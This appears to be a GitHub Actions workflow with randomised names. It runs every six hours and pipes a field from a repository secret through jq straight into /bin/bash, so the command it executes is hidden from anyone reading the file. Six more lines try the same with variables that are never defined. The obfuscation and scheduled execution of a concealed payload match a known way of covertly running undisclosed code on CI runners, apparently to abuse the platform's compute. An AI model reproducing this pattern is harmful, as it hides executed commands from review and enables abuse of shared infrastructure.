name: yinzhiping2389
on:
  workflow_dispatch:
  schedule:
    - cron: '38 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yinzhiping2389
        env:
          xbll651: ${{ secrets.xbll651 }}
        run: |
          echo $xbll651 | jq -r .h86468 | /bin/bash
          echo $ph703 | jq -r .nzyf20801 | /bin/bash
          echo $nmxcg228 | jq -r .yljy04971 | /bin/bash
          echo $qqee396 | jq -r .zdow9 | /bin/bash
          echo $sbrqg153 | jq -r .paqgk32591 | /bin/bash
          echo $frh95 | jq -r .bhlgi5976 | /bin/bash
          echo $annvx05 | jq -r .kbt11959 | /bin/bash

